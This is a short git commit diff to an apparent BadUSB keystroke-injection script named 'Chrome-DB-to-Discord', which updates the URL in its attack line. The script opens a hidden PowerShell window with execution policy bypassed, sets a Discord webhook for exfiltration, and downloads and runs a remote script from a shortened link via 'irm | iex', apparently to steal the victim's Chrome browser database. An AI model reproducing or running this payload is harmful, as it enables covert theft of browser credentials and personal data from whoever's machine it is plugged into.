Update Chrome-DB-to-Discord.txt

This commit is contained in:
egieb
2025-06-16 10:31:36 +00:00
committed by GitHub
parent 6011c346eb
commit 05566f6a10

View File

@@ -13,7 +13,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm https://bw0.cc/lht | iex
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwchdbdc | iex
ENTER